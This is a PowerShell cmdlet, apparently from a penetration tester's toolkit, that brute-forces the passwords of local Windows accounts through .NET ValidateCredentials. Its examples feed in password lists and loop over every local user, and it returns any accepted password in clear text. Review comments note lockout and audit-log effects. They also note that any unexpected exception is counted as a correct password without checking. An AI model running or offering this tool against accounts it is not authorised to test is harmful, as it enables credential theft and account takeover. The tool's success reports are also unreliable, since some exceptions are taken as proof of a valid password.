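Function Test-BruteLocalUserCredential {
<#
.SYNOPSIS
This cmdlet is used to brute force the password of a local user account on a windows machine
.DESCRIPTION
Use .NET to brute force the password of a local account on a windows machine using the ValidateCredentials method.
Passwords are tried in the order given and testing stops at the first one that is accepted.
.PARAMETER Username
This parameter defines the local user account you wish to test passwords against
.PARAMETER Passwd
This parameter defines the passwords you wish to test against the local user account you define
.EXAMPLE
Test-BruteLocalUserCredential -Username Administrator -Passwd 'Password123!','Passw0rd1!'
# This example tests the two defined passwords against the Administrator user account
.EXAMPLE
Test-BruteLocalUserCredential -Username Administrator -Passwd (Get-Content -Path C:\Temp\passlist.txt)
# This example tests the passwords inside the C:\Temp\passlist.txt file against the Administrator user account
.EXAMPLE
$Users = (Get-LocalUser).Name
ForEach ($U in $Users) {Test-BruteLocalUserCredential -Username $U -Passwd (Get-Content -Path C:\Temp\passlist.txt)}
# This example tests a password list against all local user accounts
.NOTES
Author: Robert H. Osborne
Alias: tobor
Contact: [email protected]

Every rejected password is a failed logon for the target account. It counts toward the
account lockout threshold where one is configured, and it is expected to show up as a
failed-logon audit event (Event ID 4625) in the Security log when logon auditing is enabled.

Candidate passwords are written to the verbose stream in clear text and the returned object
holds the accepted password in clear text, so transcripts and captured output of this
function must be handled as secrets.
.LINK
https://osbornepro.com
https://writeups.osbornepro.com
https://encrypit.osbornepro.com
https://btpssecpack.osbornepro.com
https://github.com/tobor88
https://github.com/OsbornePro
https://gitlab.com/tobor88
https://www.powershellgallery.com/profiles/tobor
https://www.linkedin.com/in/roberthosborne/
https://www.credly.com/users/roberthosborne/badges
https://www.hackthebox.eu/profile/52286
.INPUTS
None
.OUTPUTS
System.String status messages, followed by a PSCustomObject with Username and Password properties when a credential is accepted
#>
    [CmdletBinding()]
        param(
            [Parameter(
                Mandatory=$True,
                ValueFromPipeline=$False,
                HelpMessage="`n[H] Enter the username of the local account you wish to brute password tests against. `n[E] EXAMPLE: Administrator")]  # End Parameter
            [Alias('Name','User','u')]
            [ValidateScript({Get-LocalUser -Name $_})]
            [String]$Username,

            [Parameter(
                Mandatory=$True,
                ValueFromPipeline=$False,
                HelpMessage="`n[H] Define passwords to test against the user specified, separate multiple values with a comma, EXAMPLE: 'Passw0rd1!','Password123!'")]  # End Parameter
            [String[]]$Passwd
        )  # End param

    Write-Verbose -Message "Adding required .NET method for Account Management"
    # Setup errors must stop the function. If they were silenced, $Attempt would be $Null and the
    # catch-all below would report the first password as a success.
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement -ErrorAction Stop

    $Type = [DirectoryServices.AccountManagement.ContextType]::Machine
    $Attempt = [DirectoryServices.AccountManagement.PrincipalContext]::New($Type)
    $Result = $Null

    Try {

        ForEach ($P in $Passwd) {

            Try {

                If ($Attempt.ValidateCredentials($Username,$P)) {

                    Write-Output -InputObject "[*] SUCCESS: User has sign in permissions"
                    $Result = New-Object -TypeName PSCustomObject -Property @{Username=$Username; Password=$P}

                } Else {

                    Write-Verbose -Message "FAILURE: $Username : $P"

                }  # End If Else

            } Catch [UnauthorizedAccessException] {

                Write-Verbose -Message "FAILURE: $Username : $P"

            } Catch {

                # NOTE(review): every other exception is taken to mean "password correct, sign in denied".
                # That is the author's interpretation and is not verified here, so the exception text is
                # surfaced on the verbose stream to let the operator confirm the result.
                Write-Verbose -Message "Exception treated as success: $($_.Exception.Message)"
                Write-Output -InputObject "[*] SUCCESS: However this user does not have Sign In permissions"
                $Result = New-Object -TypeName PSCustomObject -Property @{Username=$Username; Password=$P}

            }  # End Try Catch Catch

            If ($Result) {

                # Stop at the first accepted password so no further failed logons are generated
                Break

            }  # End If

        }  # End ForEach

    } Finally {

        # PrincipalContext is disposable; release it on every exit path
        $Attempt.Dispose()

    }  # End Try Finally

    # The result is returned here rather than from inside a Finally block because PowerShell
    # does not allow Return or Continue to leave a Finally block.
    If ($Result) {

        Return $Result

    }  # End If

    # Reported only after the whole list was tried without a match. Comparing each password with the
    # last list entry would also fire when the last entry was the correct one or appeared twice.
    Write-Output -InputObject "[*] None of the specified credentials were successful"

}  # End Function Test-BruteLocalUserCredential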